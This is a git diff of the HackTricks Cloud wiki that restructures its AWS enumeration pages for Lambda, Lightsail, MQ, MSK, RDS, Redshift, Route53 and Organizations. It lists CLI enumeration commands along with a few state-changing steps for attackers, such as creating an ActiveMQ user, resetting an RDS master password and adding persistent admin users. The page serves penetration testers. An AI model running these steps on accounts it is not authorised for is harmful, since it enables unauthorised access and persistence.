- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Lambda @@ -29,7 +16,7 @@ A Lambda can have **several versions**.\ And it can have **more than 1** version exposed via **aliases**. The **weights** of **each** of the **versions** exposed inside and alias will decide **which alias receive the invocation** (it can be 90%-10% for example).\ If the code of **one** of the aliases is **vulnerable** you can send **requests until the vulnerable** versions receives the exploit. -![](<../../../.gitbook/assets/image (223).png>) +![](<../../../images/image (223).png>) ### Resource Policies 
@@ -65,8 +52,8 @@ Functions deployed as a container image do not use layers. Instead, you package Lambda extensions enhance functions by integrating with various **monitoring, observability, security, and governance tools**. These extensions, added via [.zip archives using Lambda layers](https://docs.aws.amazon.com/lambda/latest/dg/configuration-layers.html) or included in [container image deployments](https://aws.amazon.com/blogs/compute/working-with-lambda-layers-and-extensions-in-container-images/), operate in two modes: **internal** and **external**. -* **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**. -* **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**. +- **Internal extensions** merge with the runtime process, manipulating its startup using **language-specific environment variables** and **wrapper scripts**. This customization applies to a range of runtimes, including **Java Correto 8 and 11, Node.js 10 and 12, and .NET Core 3.1**. +- **External extensions** run as separate processes, maintaining operation alignment with the Lambda function's lifecycle. They're compatible with various runtimes like **Node.js 10 and 12, Python 3.7 and 3.8, Ruby 2.5 and 2.7, Java Corretto 8 and 11, .NET Core 3.1**, and **custom runtimes**. ### Enumeration 
@@ -135,7 +122,7 @@ Now it's time to find out possible lambda functions to execute: aws --region us-west-2 --profile level6 lambda list-functions ``` -![](<../../../.gitbook/assets/image (262).png>) +![](<../../../images/image (262).png>) A lambda function called "Level6" is available. Lets find out how to call it: @@ -143,7 +130,7 @@ A lambda function called "Level6" is available. Lets find out how to call it: aws --region us-west-2 --profile level6 lambda get-policy --function-name Level6 ``` -![](<../../../.gitbook/assets/image (102).png>) +![](<../../../images/image (102).png>) Now, that you know the name and the ID you can get the Name: @@ -151,7 +138,7 @@ Now, that you know the name and the ID you can get the Name: aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75" ``` -![](<../../../.gitbook/assets/image (237).png>) +![](<../../../images/image (237).png>) And finally call the function accessing (notice that the ID, Name and function-name appears in the URL): [https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6](https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6) @@ -161,50 +148,37 @@ And finally call the function accessing (notice that the ID, Name and function-n There are a lot of other sources that can trigger a lambda -
+
### Privesc In the following page you can check how to **abuse Lambda permissions to escalate privileges**: -{% content-ref url="../aws-privilege-escalation/aws-lambda-privesc.md" %} -[aws-lambda-privesc.md](../aws-privilege-escalation/aws-lambda-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-lambda-privesc.md +{{#endref}} ### Unauthenticated Access -{% content-ref url="../aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md" %} -[aws-lambda-unauthenticated-access.md](../aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md) -{% endcontent-ref %} +{{#ref}} +../aws-unauthenticated-enum-access/aws-lambda-unauthenticated-access.md +{{#endref}} ### Post Exploitation -{% content-ref url="../aws-post-exploitation/aws-lambda-post-exploitation/" %} -[aws-lambda-post-exploitation](../aws-post-exploitation/aws-lambda-post-exploitation/) -{% endcontent-ref %} +{{#ref}} +../aws-post-exploitation/aws-lambda-post-exploitation/ +{{#endref}} ### Persistence -{% content-ref url="../aws-persistence/aws-lambda-persistence/" %} -[aws-lambda-persistence](../aws-persistence/aws-lambda-persistence/) -{% endcontent-ref %} +{{#ref}} +../aws-persistence/aws-lambda-persistence/ +{{#endref}} ## References -* [https://docs.aws.amazon.com/lambda/latest/dg/gettingstarted-concepts.html#gettingstarted-concepts-layer](https://docs.aws.amazon.com/lambda/latest/dg/gettingstarted-concepts.html#gettingstarted-concepts-layer) -* [https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/](https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/) +- [https://docs.aws.amazon.com/lambda/latest/dg/gettingstarted-concepts.html#gettingstarted-concepts-layer](https://docs.aws.amazon.com/lambda/latest/dg/gettingstarted-concepts.html#gettingstarted-concepts-layer) +- 
[https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/](https://aws.amazon.com/blogs/compute/building-extensions-for-aws-lambda-in-preview/) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md
new file mode 100644
index 000000000..404f14c10
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-lightsail-enum.md
@@ -0,0 +1,59 @@
+# AWS - Lightsail Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## AWS - Lightsail
+
+Amazon Lightsail provides an **easy**, lightweight way for new cloud users to take advantage of AWS’ cloud computing services. It allows you to deploy common and custom web services in seconds via **VMs** (**EC2**) and **containers**.\
+It's a **minimal EC2 + Route53 + ECS**.
+
+### Enumeration
+
+```bash
+# Instances
+aws lightsail get-instances #Get all
+aws lightsail get-instance-port-states --instance-name #Get open ports
+
+# Databases
+aws lightsail get-relational-databases
+aws lightsail get-relational-database-snapshots
+aws lightsail get-relational-database-parameters
+
+# Disk & snapshots
+aws lightsail get-instance-snapshots
+aws lightsail get-disk-snapshots
+aws lightsail get-disks
+
+# More
+aws lightsail get-load-balancers
+aws lightsail get-static-ips
+aws lightsail get-key-pairs
+```
+
+### Analyse Snapshots
+
+It's possible to generate **instance and relational database snapshots from lightsail**. Therefore you can check those the same way you can check [**EC2 snapshots**](aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/#ebs) and [**RDS snapshots**](aws-relational-database-rds-enum.md#enumeration).
+
+### Metadata
+
+**Metadata endpoint is accessible from lightsail**, but the machines are running in an **AWS account managed by AWS** so you don't control **what permissions are being granted**. However, if you find a way to exploit those you would be directly exploiting AWS.
+
+### Privesc
+
+{{#ref}}
+../aws-privilege-escalation/aws-lightsail-privesc.md
+{{#endref}}
+
+### Post Exploitation
+
+{{#ref}}
+../aws-post-exploitation/aws-lightsail-post-exploitation.md
+{{#endref}}
+
+### Persistence
+
+{{#ref}}
+../aws-persistence/aws-lightsail-persistence.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md
new file mode 100644
index 000000000..8e221776a
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-mq-enum.md
@@ -0,0 +1,76 @@
+# AWS - MQ Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Amazon MQ
+
+### Introduction to Message Brokers
+
+**Message brokers** serve as intermediaries, facilitating communication between different software systems, which may be built on varied platforms and programmed in different languages. **Amazon MQ** simplifies the deployment, operation, and maintenance of message brokers on AWS. It provides managed services for **Apache ActiveMQ** and **RabbitMQ**, ensuring seamless provisioning and automatic software version updates.
+
+### AWS - RabbitMQ
+
+RabbitMQ is a prominent **message-queueing software**, also known as a _message broker_ or _queue manager_. It's fundamentally a system where queues are configured. Applications interface with these queues to **send and receive messages**. Messages in this context can carry a variety of information, ranging from commands to initiate processes on other applications (potentially on different servers) to simple text messages. The messages are held by the queue-manager software until they are retrieved and processed by a receiving application. AWS provides an easy-to-use solution for hosting and managing RabbitMQ servers.
+
+### AWS - ActiveMQ
+
+Apache ActiveMQ® is a leading open-source, Java-based **message broker** known for its versatility. It supports multiple industry-standard protocols, offering extensive client compatibility across a wide array of languages and platforms. Users can:
+
+- Connect with clients written in JavaScript, C, C++, Python, .Net, and more.
+- Leverage the **AMQP** protocol to integrate applications from different platforms.
+- Use **STOMP** over websockets for web application message exchanges.
+- Manage IoT devices with **MQTT**.
+- Maintain existing **JMS** infrastructure and extend its capabilities.
+
+ActiveMQ's robustness and flexibility make it suitable for a multitude of messaging requirements.
+
+## Enumeration
+
+```bash
+# List brokers
+aws mq list-brokers
+
+# Get broker info
+aws mq describe-broker --broker-id
+## Find endpoints in .BrokerInstances
+## Find if public accessible in .PubliclyAccessible
+
+# List usernames (only for ActiveMQ)
+aws mq list-users --broker-id
+
+# Get user info (PASSWORD NOT INCLUDED)
+aws mq describe-user --broker-id --username
+
+# Lits configurations (only for ActiveMQ)
+aws mq list-configurations
+## Here you can find if simple or LDAP authentication is used
+
+# Creacte Active MQ user
+aws mq create-user --broker-id --password --username --console-access
+```
+
+> [!WARNING]
+> TODO: Indicate how to enumerate RabbitMQ and ActiveMQ internally and how to listen in all queues and send data (send PR if you know how to do this)
+
+## Privesc
+
+{{#ref}}
+../aws-privilege-escalation/aws-mq-privesc.md
+{{#endref}}
+
+## Unauthenticated Access
+
+{{#ref}}
+../aws-unauthenticated-enum-access/aws-mq-unauthenticated-enum.md
+{{#endref}}
+
+## Persistence
+
+If you know the credentials to access the RabbitMQ web console, you can create a new user qith admin privileges.
+
+## References
+
+- [https://www.cloudamqp.com/blog/part1-rabbitmq-for-beginners-what-is-rabbitmq.html](https://www.cloudamqp.com/blog/part1-rabbitmq-for-beginners-what-is-rabbitmq.html)
+- [https://activemq.apache.org/](https://activemq.apache.org/)
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md
similarity index 59%
rename from pentesting-cloud/aws-security/aws-services/aws-msk-enum.md
rename to src/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md
index 4e2cae977..ca0098630 100644
--- a/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-msk-enum.md
@@ -1,19 +1,6 @@ # AWS - MSK Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Amazon MSK @@ -27,9 +14,9 @@ There are 2 types of Kafka clusters that AWS allows to create: Provisioned and S From the point of view of an attacker you need to know that: -* **Serverless cannot be directly public** (it can only run in a VPN without any publicly exposed IP). However, **Provisioned** can be configured to get a **public IP** (by default it doesn't) and configure the **security group** to **expose** the relevant ports. -* **Serverless** **only support IAM** as authentication method. **Provisioned** support SASL/SCRAM (**password**) authentication, **IAM** authentication, AWS **Certificate** Manager (ACM) authentication and **Unauthenticated** access. - * Note that it's not possible to expose publicly a Provisioned Kafka if unauthenticated access is enabled +- **Serverless cannot be directly public** (it can only run in a VPN without any publicly exposed IP). However, **Provisioned** can be configured to get a **public IP** (by default it doesn't) and configure the **security group** to **expose** the relevant ports. +- **Serverless** **only support IAM** as authentication method. **Provisioned** support SASL/SCRAM (**password**) authentication, **IAM** authentication, AWS **Certificate** Manager (ACM) authentication and **Unauthenticated** access. + - Note that it's not possible to expose publicly a Provisioned Kafka if unauthenticated access is enabled ### Enumeration @@ -65,7 +52,7 @@ aws kafka list-scram-secrets --cluster-arn wget https://archive.apache.org/dist/kafka/2.8.1/kafka_2.12-2.8.1.tgz tar -xzf kafka_2.12-2.8.1.tgz -# In kafka_2.12-2.8.1/libs download the MSK IAM JAR file. +# In kafka_2.12-2.8.1/libs download the MSK IAM JAR file. cd kafka_2.12-2.8.1/libs wget https://github.com/aws/aws-msk-iam-auth/releases/download/v1.1.1/aws-msk-iam-auth-1.1.1-all.jar 
@@ -91,15 +78,15 @@ kafka_2.12-2.8.1/bin/kafka-console-consumer.sh --bootstrap-server $BS --consumer ### Privesc -{% content-ref url="../aws-privilege-escalation/aws-msk-privesc.md" %} -[aws-msk-privesc.md](../aws-privilege-escalation/aws-msk-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-msk-privesc.md +{{#endref}} ### Unauthenticated Access -{% content-ref url="../aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md" %} -[aws-msk-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-unauthenticated-enum-access/aws-msk-unauthenticated-enum.md +{{#endref}} ### Persistence @@ -107,19 +94,6 @@ If you are going to **have access to the VPC** where a Provisioned Kafka is, you ## References -* [https://docs.aws.amazon.com/msk/latest/developerguide/what-is-msk.html](https://docs.aws.amazon.com/msk/latest/developerguide/what-is-msk.html) +- [https://docs.aws.amazon.com/msk/latest/developerguide/what-is-msk.html](https://docs.aws.amazon.com/msk/latest/developerguide/what-is-msk.html) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md new file mode 100644 index 000000000..445b9c5df --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-organizations-enum.md 
@@ -0,0 +1,47 @@
+# AWS - Organizations Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Baisc Information
+
+AWS Organizations facilitates the creation of new AWS accounts without incurring additional costs. Resources can be allocated effortlessly, accounts can be efficiently grouped, and governance policies can be applied to individual accounts or groups, enhancing management and control within the organization.
+
+Key Points:
+
+- **New Account Creation**: AWS Organizations allows the creation of new AWS accounts without extra charges.
+- **Resource Allocation**: It simplifies the process of allocating resources across the accounts.
+- **Account Grouping**: Accounts can be grouped together, making management more streamlined.
+- **Governance Policies**: Policies can be applied to accounts or groups of accounts, ensuring compliance and governance across the organization.
+
+You can find more information in:
+
+{{#ref}}
+../aws-basic-information/
+{{#endref}}
+
+```bash
+# Get Org
+aws organizations describe-organization
+aws organizations list-roots
+
+# Get OUs, from root and from other OUs
+aws organizations list-organizational-units-for-parent --parent-id r-lalala
+aws organizations list-organizational-units-for-parent --parent-id ou-n8s9-8nzv3a5y
+
+# Get accounts
+## List all the accounts without caring about the parent
+aws organizations list-accounts
+## Accounts from a parent
+aws organizations list-accounts-for-parent --parent-id r-lalala
+aws organizations list-accounts-for-parent --parent-id ou-n8s9-8nzv3a5y
+
+# Get basic account info
+## You need the permission iam:GetAccountSummary
+aws iam get-account-summary
+```
+
+## References
+
+- https://aws.amazon.com/organizations/
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md
new file mode 100644
index 000000000..8e2042191
--- /dev/null
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-other-services-enum.md
@@ -0,0 +1,24 @@
+# AWS - Other Services Enum
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## Directconnect
+
+Allows to **connect a corporate private network with AWS** (so you could compromise an EC2 instance and access the corporate network).
+
+```
+aws directconnect describe-connections
+aws directconnect describe-interconnects
+aws directconnect describe-virtual-gateways
+aws directconnect describe-virtual-interfaces
+```
+
+## Support
+
+In AWS you can access current and previous support cases via the API
+
+```
+aws support describe-cases --include-resolved-cases
+```
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md
similarity index 70%
rename from pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md
rename to src/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md
index 3580f80fd..37304bdad 100644
--- a/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md
+++ b/src/pentesting-cloud/aws-security/aws-services/aws-redshift-enum.md
@@ -1,19 +1,6 @@
 # AWS - Redshift Enum
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Amazon Redshift @@ -98,28 +85,15 @@ psql -h redshift-cluster-1.sdflju3jdfkfg.us-east-1.redshift.amazonaws.com -U adm ## Privesc -{% content-ref url="../aws-privilege-escalation/aws-redshift-privesc.md" %} -[aws-redshift-privesc.md](../aws-privilege-escalation/aws-redshift-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-redshift-privesc.md +{{#endref}} ## Persistence The following actions allow to grant access to other AWS accounts to the cluster: -* [authorize-endpoint-access](https://docs.aws.amazon.com/cli/latest/reference/redshift/authorize-endpoint-access.html) -* [authorize-snapshot-access](https://docs.aws.amazon.com/cli/latest/reference/redshift/authorize-snapshot-access.html) +- [authorize-endpoint-access](https://docs.aws.amazon.com/cli/latest/reference/redshift/authorize-endpoint-access.html) +- [authorize-snapshot-access](https://docs.aws.amazon.com/cli/latest/reference/redshift/authorize-snapshot-access.html) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md similarity index 53% rename from pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md index 2b1ff5644..a91ada4e0 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-relational-database-rds-enum.md @@ -1,19 +1,6 @@ # AWS - Relational Database (RDS) Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} ## Basic Information @@ -23,29 +10,29 @@ AWS RDS supports various widely-used relational database engines including MySQL Key features of RDS include: -* **Management of database instances** is simplified. -* Creation of **read replicas** to enhance read performance. -* Configuration of **multi-Availability Zone (AZ) deployments** to ensure high availability and failover mechanisms. -* **Integration** with other AWS services, such as: - * AWS Identity and Access Management (**IAM**) for robust access control. - * AWS **CloudWatch** for comprehensive monitoring and metrics. - * AWS Key Management Service (**KMS**) for ensuring encryption at rest. +- **Management of database instances** is simplified. +- Creation of **read replicas** to enhance read performance. +- Configuration of **multi-Availability Zone (AZ) deployments** to ensure high availability and failover mechanisms. +- **Integration** with other AWS services, such as: + - AWS Identity and Access Management (**IAM**) for robust access control. + - AWS **CloudWatch** for comprehensive monitoring and metrics. + - AWS Key Management Service (**KMS**) for ensuring encryption at rest. ## Credentials When creating the DB cluster the master **username** can be configured (**`admin`** by default). To generate the password of this user you can: -* **Indicate** a **password** yourself -* Tell RDS to **auto generate** it -* Tell RDS to manage it in **AWS Secret Manager** encrypted with a KMS key +- **Indicate** a **password** yourself +- Tell RDS to **auto generate** it +- Tell RDS to manage it in **AWS Secret Manager** encrypted with a KMS key -
+
### Authentication There are 3 types of authentication options, but using the **master password is always allowed**: -
+
### Public Access & VPC 
@@ -71,21 +58,20 @@ Alongside the encryption capabilities inherent to RDS at the application level, To utilize TDE, certain preliminary steps are required: 1. **Option Group Association**: - * The database must be associated with an option group. Option groups serve as containers for settings and features, facilitating database management, including security enhancements. - * However, it's important to note that option groups are only available for specific database engines and versions. + - The database must be associated with an option group. Option groups serve as containers for settings and features, facilitating database management, including security enhancements. + - However, it's important to note that option groups are only available for specific database engines and versions. 2. **Inclusion of TDE in Option Group**: - * Once associated with an option group, the Oracle Transparent Data Encryption option needs to be included in that group. - * It's essential to recognize that once the TDE option is added to an option group, it becomes a permanent fixture and cannot be removed. + - Once associated with an option group, the Oracle Transparent Data Encryption option needs to be included in that group. + - It's essential to recognize that once the TDE option is added to an option group, it becomes a permanent fixture and cannot be removed. 3. **TDE Encryption Modes**: - * TDE offers two distinct encryption modes: - * **TDE Tablespace Encryption**: This mode encrypts entire tables, providing a broader scope of data protection. - * **TDE Column Encryption**: This mode focuses on encrypting specific, individual elements within the database, allowing for more granular control over what data is encrypted. + - TDE offers two distinct encryption modes: + - **TDE Tablespace Encryption**: This mode encrypts entire tables, providing a broader scope of data protection. 
+ - **TDE Column Encryption**: This mode focuses on encrypting specific, individual elements within the database, allowing for more granular control over what data is encrypted. Understanding these prerequisites and the operational intricacies of TDE is crucial for effectively implementing and managing encryption within RDS, ensuring both data security and compliance with necessary standards. ### Enumeration -{% code overflow="wrap" %} ```bash # Clusters info ## Get Endpoints, username, port, iam auth enabled, attached roles, SG @@ -104,7 +90,7 @@ aws rds describe-db-security-groups aws rds describe-db-instance-automated-backups ## Find snapshots -aws rds describe-db-snapshots +aws rds describe-db-snapshots aws rds describe-db-snapshots --include-public --snapshot-type public ## Restore snapshot as new instance aws rds restore-db-instance-from-db-snapshot --db-instance-identifier --db-snapshot-identifier --availability-zone us-west-2a 
@@ -120,49 +106,37 @@ aws rds describe-db-proxy-targets ## reset credentials of MasterUsername aws rds modify-db-instance --db-instance-identifier --master-user-password --apply-immediately ``` -{% endcode %} ### Unauthenticated Access -{% content-ref url="../aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md" %} -[aws-rds-unauthenticated-enum.md](../aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md) -{% endcontent-ref %} +{{#ref}} +../aws-unauthenticated-enum-access/aws-rds-unauthenticated-enum.md +{{#endref}} ### Privesc -{% content-ref url="../aws-privilege-escalation/aws-rds-privesc.md" %} -[aws-rds-privesc.md](../aws-privilege-escalation/aws-rds-privesc.md) -{% endcontent-ref %} +{{#ref}} +../aws-privilege-escalation/aws-rds-privesc.md +{{#endref}} ### Post Exploitation -{% content-ref url="../aws-post-exploitation/aws-rds-post-exploitation.md" %} -[aws-rds-post-exploitation.md](../aws-post-exploitation/aws-rds-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../aws-post-exploitation/aws-rds-post-exploitation.md +{{#endref}} ### Persistence -{% content-ref url="../aws-persistence/aws-rds-persistence.md" %} -[aws-rds-persistence.md](../aws-persistence/aws-rds-persistence.md) -{% endcontent-ref %} +{{#ref}} +../aws-persistence/aws-rds-persistence.md +{{#endref}} ### SQL Injection There are ways to access DynamoDB data with **SQL syntax**, therefore, typical **SQL injections are also possible**. -{% embed url="https://book.hacktricks.xyz/pentesting-web/sql-injection" %} +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/sql-injection +{{#endref}} -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md new file mode 100644 index 000000000..2d806cac0 --- /dev/null +++ b/src/pentesting-cloud/aws-security/aws-services/aws-route53-enum.md @@ -0,0 +1,31 @@ +# AWS - Route53 Enum + +{{#include ../../../banners/hacktricks-training.md}} + +## Route 53 + +Amazon Route 53 is a cloud **Domain Name System (DNS)** web service.\ +You can create https, http and tcp **health checks for web pages** via Route53. + +### IP-based routing + +This is useful to tune your DNS routing to make the best DNS routing decisions for your end users.\ +IP-based routing offers you the additional ability to **optimize routing based on specific knowledge of your customer base**. + +### Enumeration + +```bash +aws route53 list-hosted-zones # Get domains +aws route53 get-hosted-zone --id +aws route53 list-resource-record-sets --hosted-zone-id # Get all records +aws route53 list-health-checks +aws route53 list-traffic-policies +``` + +### Privesc + +{{#ref}} +../aws-privilege-escalation/route53-createhostedzone-route53-changeresourcerecordsets-acm-pca-issuecertificate-acm-pca-getcer.md +{{#endref}} + +{{#include ../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md similarity index 69% rename from pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md index 8f64145bd..782731590 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-s3-athena-and-glacier-enum.md 
